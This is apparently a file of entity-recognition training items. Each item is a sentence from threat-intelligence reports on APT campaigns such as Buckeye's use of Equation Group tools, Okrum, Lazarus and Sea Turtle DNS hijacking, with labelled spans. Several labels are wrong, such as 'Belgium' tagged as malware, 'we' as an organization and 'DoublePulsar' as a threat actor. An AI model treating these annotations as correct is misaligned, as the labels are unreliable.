{"text": "The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes ‘Gh0st’ as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim .", "spans": {"THREAT_ACTOR: Gh0st RAT 3.6": [[34, 47]], "TOOL: zlib compression": [[56, 72]]}, "info": {"id": "dnrti_train_002600", "source": "dnrti_train"}}
{"text": "In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": {"MALWARE: Gh0st RAT": [[41, 50]], "THREAT_ACTOR: Ghost Dragon": [[61, 73]]}, "info": {"id": "dnrti_train_002601", "source": "dnrti_train"}}
{"text": "SPEAR has observed numerous different XOR keys utilized by Ghost Dragon .", "spans": {"THREAT_ACTOR: Ghost Dragon": [[59, 71]]}, "info": {"id": "dnrti_train_002602", "source": "dnrti_train"}}
{"text": "Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 .", "spans": {"THREAT_ACTOR: Buckeye's": [[45, 54]]}, "info": {"id": "dnrti_train_002603", "source": "dnrti_train"}}
{"text": "The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]], "TOOL: Equation Group tools": [[35, 55]]}, "info": {"id": "dnrti_train_002604", "source": "dnrti_train"}}
{"text": "Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability .", "spans": {"THREAT_ACTOR: Buckeye's": [[0, 9]]}, "info": {"id": "dnrti_train_002605", "source": "dnrti_train"}}
{"text": "While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 .", "spans": {"THREAT_ACTOR: Buckeye": [[6, 13]], "TOOL: Equation Group tools": [[61, 81]]}, "info": {"id": "dnrti_train_002606", "source": "dnrti_train"}}
{"text": "The 2017 leak of Equation Group tools by a mysterious group calling itself the Shadow Brokers was one of the most significant cyber security stories in recent years .", "spans": {"THREAT_ACTOR: mysterious group": [[43, 59]]}, "info": {"id": "dnrti_train_002607", "source": "dnrti_train"}}
{"text": "However , Symantec has now found evidence that the Buckeye cyber espionage group (aka APT3 , Gothic Panda ) began using Equation Group tools in attacks at least a year prior to the Shadow Brokers leak .", "spans": {"ORGANIZATION: Symantec": [[10, 18]], "THREAT_ACTOR: Buckeye": [[51, 58]], "THREAT_ACTOR: (aka APT3": [[81, 90]], "THREAT_ACTOR: Gothic Panda": [[93, 105]], "TOOL: Equation Group tools": [[120, 140]]}, "info": {"id": "dnrti_train_002608", "source": "dnrti_train"}}
{"text": "Equation is regarded as one of the most technically adept espionage groups and the release of a trove of its tools had a major impact , with many attackers rushing to deploy the malware and exploits disclosed .", "spans": {"THREAT_ACTOR: Equation": [[0, 8]], "TOOL: trove": [[96, 101]]}, "info": {"id": "dnrti_train_002609", "source": "dnrti_train"}}
{"text": "DoublePulsar was delivered to victims using a custom exploit tool (Trojan.Bemstour) that was specifically designed to install DoublePulsar .", "spans": {"THREAT_ACTOR: DoublePulsar": [[0, 12]], "TOOL: exploit tool": [[53, 65]]}, "info": {"id": "dnrti_train_002610", "source": "dnrti_train"}}
{"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec .", "spans": {"VULNERABILITY: zero-day vulnerability": [[31, 53]], "ORGANIZATION: Symantec": [[84, 92]]}, "info": {"id": "dnrti_train_002611", "source": "dnrti_train"}}
{"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"THREAT_ACTOR: Bemstour": [[0, 8]], "VULNERABILITY: vulnerabilities": [[30, 45]]}, "info": {"id": "dnrti_train_002612", "source": "dnrti_train"}}
{"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"VULNERABILITY: vulnerability": [[19, 32]], "THREAT_ACTOR: Shadow Brokers": [[211, 225]]}, "info": {"id": "dnrti_train_002613", "source": "dnrti_train"}}
{"text": "It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 .", "spans": {"ORGANIZATION: Symantec": [[19, 27]]}, "info": {"id": "dnrti_train_002614", "source": "dnrti_train"}}
{"text": "How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]], "TOOL: Equation Group tools": [[21, 41]]}, "info": {"id": "dnrti_train_002615", "source": "dnrti_train"}}
{"text": "The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": {"THREAT_ACTOR: Buckeye": [[4, 11]]}, "info": {"id": "dnrti_train_002616", "source": "dnrti_train"}}
{"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 .", "spans": {"VULNERABILITY: CVE-2010-3962": [[14, 27]], "VULNERABILITY: CVE-2014-1776": [[70, 83]]}, "info": {"id": "dnrti_train_002617", "source": "dnrti_train"}}
{"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[54, 68]], "THREAT_ACTOR: Equation": [[130, 138]]}, "info": {"id": "dnrti_train_002618", "source": "dnrti_train"}}
{"text": "Over the coming months , it progressively released more tools , until April 2017 , when it released a final , large cache of tools , including the DoublePulsar backdoor , the FuzzBunch framework , and the EternalBlue , EternalSynergy , and EternalRomance exploit tools .", "spans": {"TOOL: DoublePulsar": [[147, 159]], "TOOL: backdoor": [[160, 168]], "TOOL: FuzzBunch": [[175, 184]], "TOOL: framework": [[185, 194]], "TOOL: EternalBlue": [[205, 216]], "TOOL: EternalSynergy": [[219, 233]], "TOOL: EternalRomance": [[240, 254]], "TOOL: exploit": [[255, 262]], "TOOL: tools": [[263, 268]]}, "info": {"id": "dnrti_train_002619", "source": "dnrti_train"}}
{"text": "However , Buckeye had already been using some of these leaked tools at least a year beforehand .", "spans": {"THREAT_ACTOR: Buckeye": [[10, 17]], "TOOL: leaked tools": [[55, 67]]}, "info": {"id": "dnrti_train_002620", "source": "dnrti_train"}}
{"text": "The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong .", "spans": {"TOOL: Equation Group tools": [[26, 46]], "THREAT_ACTOR: Buckeye": [[50, 57]]}, "info": {"id": "dnrti_train_002621", "source": "dnrti_train"}}
{"text": "Beginning in March 2016 , Buckeye began using a variant of DoublePulsar (Backdoor.Doublepulsar) , a backdoor that was subsequently released by the Shadow Brokers in 2017 .", "spans": {"THREAT_ACTOR: Buckeye": [[26, 33]], "THREAT_ACTOR: Shadow Brokers": [[147, 161]]}, "info": {"id": "dnrti_train_002622", "source": "dnrti_train"}}
{"text": "However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware .", "spans": {"THREAT_ACTOR: Buckeye": [[41, 48]], "TOOL: Bemstour exploit tool": [[80, 101]], "TOOL: DoublePulsar": [[110, 122]]}, "info": {"id": "dnrti_train_002623", "source": "dnrti_train"}}
{"text": "During this attack , the Bemstour exploit tool was delivered to victims via known Buckeye malware (Backdoor.Pirpi) .", "spans": {"TOOL: Buckeye malware": [[82, 97]]}, "info": {"id": "dnrti_train_002624", "source": "dnrti_train"}}
{"text": "One hour later , Bemstour was used against an educational institution in Belgium .", "spans": {"MALWARE: Bemstour": [[17, 25]], "MALWARE: Belgium": [[73, 80]]}, "info": {"id": "dnrti_train_002625", "source": "dnrti_train"}}
{"text": "A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": {"MALWARE: Bemstour": [[40, 48]]}, "info": {"id": "dnrti_train_002628", "source": "dnrti_train"}}
{"text": "When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor .", "spans": {"TOOL: Bemstour": [[35, 43]], "TOOL: DoublePulsar backdoor": [[69, 90]]}, "info": {"id": "dnrti_train_002629", "source": "dnrti_train"}}
{"text": "Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": {"MALWARE: Bemstour": [[0, 8]]}, "info": {"id": "dnrti_train_002630", "source": "dnrti_train"}}
{"text": "Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": {"MALWARE: Bemstour": [[34, 42]]}, "info": {"id": "dnrti_train_002631", "source": "dnrti_train"}}
{"text": "Development of Bemstour has continued into 2019 .", "spans": {"MALWARE: Bemstour": [[15, 23]]}, "info": {"id": "dnrti_train_002632", "source": "dnrti_train"}}
{"text": "Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) .", "spans": {"MALWARE: Bemstour": [[28, 36]], "MALWARE: Pirpi": [[67, 72]], "MALWARE: backdoor": [[73, 81]], "TOOL: different": [[141, 150]], "TOOL: backdoor": [[151, 159]]}, "info": {"id": "dnrti_train_002633", "source": "dnrti_train"}}
{"text": "The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": {"MALWARE: Bemstour": [[26, 34]], "ORGANIZATION: Symantec": [[43, 51]]}, "info": {"id": "dnrti_train_002634", "source": "dnrti_train"}}
{"text": "Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": {"MALWARE: Filensfer": [[0, 9]]}, "info": {"id": "dnrti_train_002635", "source": "dnrti_train"}}
{"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests .", "spans": {"ORGANIZATION: Symantec": [[49, 57]], "VULNERABILITY: (CVE-2019-0703)": [[58, 73]]}, "info": {"id": "dnrti_train_002636", "source": "dnrti_train"}}
{"text": "While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": {"ORGANIZATION: Symantec": [[6, 14]], "MALWARE: Filensfer": [[45, 54]], "MALWARE: Buckeye malware": [[206, 221]], "TOOL: (Backdoor.Pirpi)": [[222, 238]]}, "info": {"id": "dnrti_train_002637", "source": "dnrti_train"}}
{"text": "Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers. the case of the Buckeye exploit tool , the attackers exploited their own zero-day vulnerability (CVE-2019-0703) .", "spans": {"MALWARE: EternalRomance": [[25, 39]], "MALWARE: EternalSynergy": [[53, 67]], "MALWARE: CVE-2017-0143": [[86, 99]], "TOOL: Buckeye exploit tool": [[213, 233]]}, "info": {"id": "dnrti_train_002639", "source": "dnrti_train"}}
{"text": "It is noteworthy that the attackers never used the FuzzBunch framework in its attacks .", "spans": {"THREAT_ACTOR: attackers": [[26, 35]], "TOOL: FuzzBunch framework": [[51, 70]]}, "info": {"id": "dnrti_train_002640", "source": "dnrti_train"}}
{"text": "FuzzBunch is a framework designed to manage DoublePulsar and other Equation Group tools and was leaked by the Shadow Brokers in 2017 .", "spans": {"TOOL: FuzzBunch": [[0, 9]], "THREAT_ACTOR: Shadow Brokers": [[110, 124]]}, "info": {"id": "dnrti_train_002641", "source": "dnrti_train"}}
{"text": "There are multiple possibilities as to how Buckeye obtained Equation Group tools before the Shadow Brokers leak .", "spans": {"THREAT_ACTOR: Buckeye": [[43, 50]], "THREAT_ACTOR: Equation Group": [[60, 74]]}, "info": {"id": "dnrti_train_002642", "source": "dnrti_train"}}
{"text": "However , aside from the continued use of the tools , Symantec has found no other evidence suggesting Buckeye has retooled .", "spans": {"ORGANIZATION: Symantec": [[54, 62]], "THREAT_ACTOR: Buckeye": [[102, 109]]}, "info": {"id": "dnrti_train_002643", "source": "dnrti_train"}}
{"text": "And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": {"MALWARE: dropper": [[8, 15]], "MALWARE: iassvcs.exe": [[28, 39]]}, "info": {"id": "dnrti_train_002645", "source": "dnrti_train"}}
{"text": "This IP is very interesting because it connects with tele.zyns.com and old infrastructures used by chinese APT or DDOS Chinese team against the ancient soviet republics .", "spans": {"THREAT_ACTOR: chinese APT": [[99, 110]]}, "info": {"id": "dnrti_train_002646", "source": "dnrti_train"}}
{"text": "Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": {"MALWARE: Filensfer": [[28, 37]]}, "info": {"id": "dnrti_train_002647", "source": "dnrti_train"}}
{"text": "All zero-day exploits known , or suspected , to have been used by this group are for vulnerabilities in Internet Explorer and Flash .", "spans": {"THREAT_ACTOR: group": [[71, 76]], "TOOL: Internet Explorer": [[104, 121]], "TOOL: Flash": [[126, 131]]}, "info": {"id": "dnrti_train_002648", "source": "dnrti_train"}}
{"text": "According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs .", "spans": {"THREAT_ACTOR: cyberattacks": [[83, 95]]}, "info": {"id": "dnrti_train_002649", "source": "dnrti_train"}}
{"text": "Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": {"MALWARE: Hussarini": [[54, 63]]}, "info": {"id": "dnrti_train_002650", "source": "dnrti_train"}}
{"text": "OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": {"MALWARE: OutExtra.exe": [[0, 12]], "MALWARE: finder.exe": [[69, 79]]}, "info": {"id": "dnrti_train_002651", "source": "dnrti_train"}}
{"text": "In addition to file-based protection , customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have received reports on Buckeye , which detail methods of detecting and thwarting activities of this group .", "spans": {"ORGANIZATION: DeepSight": [[56, 65]], "THREAT_ACTOR: Buckeye": [[161, 168]]}, "info": {"id": "dnrti_train_002652", "source": "dnrti_train"}}
{"text": "However , in this attack , this file is used to load the Hussarini backdoor via DLL hijacking .", "spans": {"THREAT_ACTOR: attack": [[18, 24]], "TOOL: DLL": [[80, 83]], "TOOL: hijacking": [[84, 93]]}, "info": {"id": "dnrti_train_002653", "source": "dnrti_train"}}
{"text": "Today , this malware is still actively being used against the Philippines .", "spans": {"MALWARE: malware": [[13, 20]]}, "info": {"id": "dnrti_train_002654", "source": "dnrti_train"}}
{"text": "Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 .", "spans": {"THREAT_ACTOR: APT": [[33, 36]]}, "info": {"id": "dnrti_train_002655", "source": "dnrti_train"}}
{"text": "Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware .", "spans": {"THREAT_ACTOR: Iron": [[33, 37]], "TOOL: IronStealer": [[113, 124]], "TOOL: Iron ransomware": [[129, 144]]}, "info": {"id": "dnrti_train_002656", "source": "dnrti_train"}}
{"text": "Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": {"MALWARE: Xagent”": [[0, 7]], "MALWARE: worm": [[83, 87]]}, "info": {"id": "dnrti_train_002657", "source": "dnrti_train"}}
{"text": "Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms .", "spans": {"THREAT_ACTOR: Xagent": [[0, 6]], "THREAT_ACTOR: JbossMiner Mining": [[22, 39]]}, "info": {"id": "dnrti_train_002658", "source": "dnrti_train"}}
{"text": "Its activities were traced back to 2010 in FireEye's 2013 report on operation Ke3chang – a cyberespionage campaign directed at diplomatic organizations in Europe .", "spans": {"ORGANIZATION: FireEye's": [[43, 52]], "THREAT_ACTOR: Ke3chang": [[78, 86]]}, "info": {"id": "dnrti_train_002659", "source": "dnrti_train"}}
{"text": "We have been tracking the malicious activities related to this threat actor and discovered a previously undocumented malware family with strong links to the Ke3chang group – a backdoor we named Okrum .", "spans": {"THREAT_ACTOR: Ke3chang": [[157, 165]], "TOOL: backdoor": [[176, 184]], "TOOL: Okrum": [[194, 199]]}, "info": {"id": "dnrti_train_002660", "source": "dnrti_train"}}
{"text": "Furthermore , from 2015 to 2019 , we detected new versions of known malware families attributed to the Ke3chang group – BS2005 backdoors from operation Ke3chang and the RoyalDNS malware , reported by NCC Group in 2018 .", "spans": {"THREAT_ACTOR: Ke3chang": [[103, 111]], "TOOL: BS2005 backdoors": [[120, 136]], "TOOL: RoyalDNS malware": [[169, 185]], "ORGANIZATION: NCC": [[200, 203]]}, "info": {"id": "dnrti_train_002661", "source": "dnrti_train"}}
{"text": "Ke3chang behind the attacks seemed to have a particular interest in Slovakia , where a big portion of the discovered malware samples was detected; Croatia , the Czech Republic and other countries were also affected .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]]}, "info": {"id": "dnrti_train_002662", "source": "dnrti_train"}}
{"text": "Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: BS2005 backdoors": [[81, 97]], "MALWARE: TidePool malware": [[141, 157]], "ORGANIZATION: Palo Alto": [[179, 188]]}, "info": {"id": "dnrti_train_002663", "source": "dnrti_train"}}
{"text": "The story continued in late 2016 , when we discovered a new , previously unknown backdoor that we named Okrum .", "spans": {"TOOL: backdoor": [[81, 89]], "TOOL: Okrum": [[104, 109]]}, "info": {"id": "dnrti_train_002664", "source": "dnrti_train"}}
{"text": "The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": {"MALWARE: Okrum malware": [[32, 45]], "MALWARE: backdoors": [[138, 147]]}, "info": {"id": "dnrti_train_002665", "source": "dnrti_train"}}
{"text": "We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": {"MALWARE: Okrum backdoor": [[59, 73]], "MALWARE: Ketrican backdoor": [[93, 110]]}, "info": {"id": "dnrti_train_002666", "source": "dnrti_train"}}
{"text": "In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": {"MALWARE: Okrum malware": [[54, 67]], "MALWARE: Ketrican backdoors": [[84, 102]]}, "info": {"id": "dnrti_train_002667", "source": "dnrti_train"}}
{"text": "This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": {"MALWARE: RoyalDNS malware": [[51, 67]], "MALWARE: Ketrican": [[74, 82]]}, "info": {"id": "dnrti_train_002668", "source": "dnrti_train"}}
{"text": "According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": {"ORGANIZATION: ESET": [[13, 17]], "MALWARE: Okrum": [[30, 35]]}, "info": {"id": "dnrti_train_002669", "source": "dnrti_train"}}
{"text": "In addition to file-based protection , customers of the DeepSight has received reports on Buckeye , which detail methods of detecting and thwarting activities of this group .", "spans": {"ORGANIZATION: DeepSight": [[56, 65]], "THREAT_ACTOR: Buckeye": [[90, 97]]}, "info": {"id": "dnrti_train_002670", "source": "dnrti_train"}}
{"text": "In 2018 , we discovered a new version of the Ketrican backdoor that featured some code improvements .", "spans": {"ORGANIZATION: we": [[10, 12]]}, "info": {"id": "dnrti_train_002671", "source": "dnrti_train"}}
{"text": "According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": {"MALWARE: Okrum": [[29, 34]]}, "info": {"id": "dnrti_train_002672", "source": "dnrti_train"}}
{"text": "Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions .", "spans": {"THREAT_ACTOR: Okrum": [[65, 70]], "TOOL: keylogger": [[83, 92]], "TOOL: tools": [[95, 100]], "TOOL: enumerating network sessions": [[128, 156]]}, "info": {"id": "dnrti_train_002673", "source": "dnrti_train"}}
{"text": "The unnamed company makes products used in the military and aerospace industries , and the hackers could have been after commercial secrets or more traditional espionage , according to ClearSky , the cybersecurity firm that exposed the operation .", "spans": {"ORGANIZATION: ClearSky": [[185, 193]]}, "info": {"id": "dnrti_train_002675", "source": "dnrti_train"}}
{"text": "North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets .", "spans": {"THREAT_ACTOR: Pyongyang-affiliated hackers": [[136, 164]], "ORGANIZATION: multinational companies’": [[202, 226]]}, "info": {"id": "dnrti_train_002676", "source": "dnrti_train"}}
{"text": "According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": {"ORGANIZATION: ClearSky": [[13, 21]], "MALWARE: WinRAR": [[104, 110]]}, "info": {"id": "dnrti_train_002677", "source": "dnrti_train"}}
{"text": "This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[9, 22]]}, "info": {"id": "dnrti_train_002678", "source": "dnrti_train"}}
{"text": "Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]]}, "info": {"id": "dnrti_train_002679", "source": "dnrti_train"}}
{"text": "Researchers implicated Lazarus Group because of digital clues including a malicious implant known as Rising Sun that has been attributed to the group .", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "THREAT_ACTOR: Lazarus": [[23, 30]], "TOOL: malicious implant": [[74, 91]], "THREAT_ACTOR: Rising Sun": [[101, 111]]}, "info": {"id": "dnrti_train_002680", "source": "dnrti_train"}}
{"text": "The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_002681", "source": "dnrti_train"}}
{"text": "Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]], "TOOL: Invoke-PSImage": [[34, 48]]}, "info": {"id": "dnrti_train_002682", "source": "dnrti_train"}}
{"text": "Once the script runs , it passes the decoded script from the image file to the Windows command line in a variable $x , which uses cmd.exe to execute the obfuscated script and run it via PowerShell .", "spans": {"THREAT_ACTOR: it": [[23, 25]], "TOOL: PowerShell": [[186, 196]]}, "info": {"id": "dnrti_train_002683", "source": "dnrti_train"}}
{"text": "The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names .", "spans": {"ORGANIZATION: (DHS)": [[36, 41]]}, "info": {"id": "dnrti_train_002684", "source": "dnrti_train"}}
{"text": "In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims .", "spans": {"ORGANIZATION: Talos": [[29, 34]]}, "info": {"id": "dnrti_train_002685", "source": "dnrti_train"}}
{"text": "The first group , we identify as primary victims , includes national security organizations , ministries of foreign affairs , and prominent energy organizations .", "spans": {"THREAT_ACTOR: group": [[10, 15]]}, "info": {"id": "dnrti_train_002686", "source": "dnrti_train"}}
{"text": "The threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]]}, "info": {"id": "dnrti_train_002687", "source": "dnrti_train"}}
{"text": "In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed .", "spans": {"THREAT_ACTOR: threat actors": [[16, 29]]}, "info": {"id": "dnrti_train_002688", "source": "dnrti_train"}}
{"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will .", "spans": {"THREAT_ACTOR: attacker": [[6, 14]]}, "info": {"id": "dnrti_train_002690", "source": "dnrti_train"}}
{"text": "If the attackers were able to obtain one of these EPP keys , they would be able to modify any DNS records that were managed by that particular registrar .", "spans": {"THREAT_ACTOR: attackers": [[7, 16]]}, "info": {"id": "dnrti_train_002691", "source": "dnrti_train"}}
{"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers .", "spans": {"THREAT_ACTOR: actor": [[70, 75]]}, "info": {"id": "dnrti_train_002692", "source": "dnrti_train"}}
{"text": "As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure .", "spans": {"THREAT_ACTOR: threat vector": [[59, 72]]}, "info": {"id": "dnrti_train_002694", "source": "dnrti_train"}}
{"text": "On January 4 , Packet Clearing House , which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system , provided confirmation of this aspect of the actors’ tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar .", "spans": {"THREAT_ACTOR: actors’": [[236, 243]]}, "info": {"id": "dnrti_train_002695", "source": "dnrti_train"}}
{"text": "During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries .", "spans": {"THREAT_ACTOR: actor": [[32, 37]]}, "info": {"id": "dnrti_train_002696", "source": "dnrti_train"}}
{"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "TOOL: MitM servers": [[41, 53]]}, "info": {"id": "dnrti_train_002697", "source": "dnrti_train"}}
{"text": "In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks .", "spans": {"TOOL: MitM server": [[19, 30]], "ORGANIZATION: Talos": [[76, 81]], "TOOL: additional servers": [[96, 114]], "THREAT_ACTOR: actor": [[132, 137]]}, "info": {"id": "dnrti_train_002698", "source": "dnrti_train"}}
{"text": "The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: MitM": [[95, 99]]}, "info": {"id": "dnrti_train_002699", "source": "dnrti_train"}}
{"text": "In some cases , the victims were redirected to these actor-controlled servers displaying the stolen certificate .", "spans": {"THREAT_ACTOR: actor-controlled": [[53, 69]], "TOOL: servers": [[70, 77]]}, "info": {"id": "dnrti_train_002700", "source": "dnrti_train"}}
{"text": "One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks .", "spans": {"THREAT_ACTOR: actors'": [[43, 50]], "TOOL: VPN applications": [[74, 90]], "TOOL: Adaptive Security Appliance": [[107, 134]]}, "info": {"id": "dnrti_train_002701", "source": "dnrti_train"}}
{"text": "At this time , we do not believe that the attackers found a new ASA exploit .", "spans": {"ORGANIZATION: we": [[15, 17]], "THREAT_ACTOR: attackers": [[42, 51]], "VULNERABILITY: ASA": [[64, 67]], "VULNERABILITY: exploit": [[68, 75]]}, "info": {"id": "dnrti_train_002702", "source": "dnrti_train"}}
{"text": "Rather , they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network .", "spans": {"THREAT_ACTOR: they": [[9, 13]], "TOOL: ASA's": [[71, 76]]}, "info": {"id": "dnrti_train_002703", "source": "dnrti_train"}}
{"text": "As an example , DNS records indicate that a targeted domain resolved to an actor-controlled MitM server .", "spans": {"THREAT_ACTOR: actor-controlled": [[75, 91]], "TOOL: MitM server": [[92, 103]]}, "info": {"id": "dnrti_train_002704", "source": "dnrti_train"}}
{"text": "In another case , the attackers were able to compromise NetNod , a non-profit , independent internet infrastructure organization based in Sweden .", "spans": {"THREAT_ACTOR: attackers": [[22, 31]]}, "info": {"id": "dnrti_train_002705", "source": "dnrti_train"}}
{"text": "Using this access , the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net .", "spans": {"THREAT_ACTOR: actors": [[31, 37]]}, "info": {"id": "dnrti_train_002706", "source": "dnrti_train"}}
{"text": "This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]]}, "info": {"id": "dnrti_train_002707", "source": "dnrti_train"}}
{"text": "In one of the more recent campaigns on March 27 , 2019 , the threat actors targeted the Sweden-based consulting firm Cafax .", "spans": {"THREAT_ACTOR: threat actors": [[61, 74]], "ORGANIZATION: Cafax": [[117, 122]]}, "info": {"id": "dnrti_train_002708", "source": "dnrti_train"}}
{"text": "We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor .", "spans": {"ORGANIZATION: NetNod": [[104, 110]], "THREAT_ACTOR: threat actor": [[162, 174]]}, "info": {"id": "dnrti_train_002709", "source": "dnrti_train"}}
{"text": "Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs .", "spans": {"THREAT_ACTOR: attackers": [[61, 70]]}, "info": {"id": "dnrti_train_002710", "source": "dnrti_train"}}
{"text": "These actors perform DNS hijacking through the use of actor-controlled name servers .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "TOOL: name servers": [[71, 83]]}, "info": {"id": "dnrti_train_002711", "source": "dnrti_train"}}
{"text": "Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs .", "spans": {"THREAT_ACTOR: Sea Turtle": [[0, 10]]}, "info": {"id": "dnrti_train_002712", "source": "dnrti_train"}}
